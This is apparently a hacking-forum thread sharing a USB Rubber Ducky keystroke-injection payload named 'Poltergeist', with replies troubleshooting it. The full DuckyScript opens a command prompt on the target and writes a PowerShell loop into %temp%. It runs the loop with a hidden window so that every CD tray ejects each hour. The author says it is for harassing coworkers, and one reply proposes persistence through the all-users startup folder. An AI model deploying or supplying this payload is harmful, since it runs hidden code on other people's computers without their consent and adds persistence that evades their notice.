[Payload] CD tray Poltergeist

[theGANOUSH]

placeholder

This payload will automatically eject all the CD trays to the target system at the beginning of every hour. The way I go about this is to create a powershell script from command line and then execute to as a background process with the "powershell -windowstyle hidden" command.

I can see a lot of potential in having this run at startup, but I had a wave of mercy when I wrote the script.

Enjoy

REM Name: Poltergeist
REM Author: theGANOUSH
REM Purpose: To mess with my coworkers by forcing their CD drives to open at the start of every hour.
REM The PowerShell code was found and modified from: http://powershell.com/cs/blogs/tips/archive/2009/04/24/ejecting-cds.aspx
REM Open Command Prompt & Navigate to %temp%
DELAY 5000
DELAY 10000
GUI r
DELAY 300
STRING cmd.exe
ENTER
DELAY 300
STRING CD %temp%
ENTER
REM Create PowerShell Script
STRING copy con Poltergeist.ps1
ENTER
STRING Do
ENTER
STRING {
ENTER
STRING $minute = Get-Date -UFormat "%M"
ENTER
STRING If($minute -eq "00")
ENTER
STRING {
ENTER
STRING    $Drives = Get-WmiObject Win32_Volume -Filter "DriveType=5" | select -exp DriveLetter
ENTER
STRING foreach($Drive in $Drives)
ENTER
STRING {
ENTER
STRING Invoke-Command -ScriptBlock {
ENTER
STRING param($Drive)
ENTER
STRING  $Drive
ENTER
STRING  $sa = New-Object -comObject Shell.Application
ENTER
STRING  $sa.Namespace(17).parseName($Drive)
ENTER
STRING  $sa.Namespace(17).ParseName("$Drive").InvokeVerb("Eject")
ENTER
STRING } -ArgumentList $Drive
ENTER
STRING }
ENTER
STRING }
STRING Start-Sleep -s 60
ENTER
STRING }
ENTER
STRING until(1 -gt 5)
ENTER
CONTROL z
ENTER
REM and execute for effect...
STRING powershell -windowstyle hidden -file .\Poltergeist.ps1
ENTER

[MB60893]

Nice Script! You could even go a step further and make it so that the script is stored in the all users startup folder for the PC. That would mean that every time a PC user logged on, the script would execute at startup!

[barry99705]

Doesn't seem to work on my pc. Maybe because I have more than one optical drive?

[}{3xcmd]

I am having a hard time with Notepad and saving to Bin file? if i use the online it kinda works, what am I missing. notepad does bin conversions right>?

[theGANOUSH]

Doesn't seem to work on my pc. Maybe because I have more than one optical drive?

I tested this on a ASUS Windows 8.1 laptop and a Dell Optiplex with two disk drives. When it ran on the Optiplex it would eject both. Are your optical drives external? Also, I would adjust the if condition to something that would occur more often then at the start of every hour to troubleshoot. If you adjust the Start-Sleep -s 60 to something less than 60, it will check the time more often and possibly catch the correct run time.

I am having a hard time with Notepad and saving to Bin file? if i use the online it kinda works, what am I missing. notepad does bin conversions right>?

I use the Duckencode.jar to generate the bin file. Edited February 27, 2014 by theGANOUSH

[hirens_whyfi]

I am having a hard time with Notepad and saving to Bin file? if i use the online it kinda works, what am I missing. notepad does bin conversions right

Hey seems like you have an issue here, i ran into the same problem i figured it all out at live.com

[MB60893]

You might just need to revise the script so that it ejects ALL of the drives. There is a way to check what sort of removable media a computer has, if it contains DVD, CD or BD (Blu Ray Disk) you are all good, else forget the drives which are flash storage or required hard drives etc.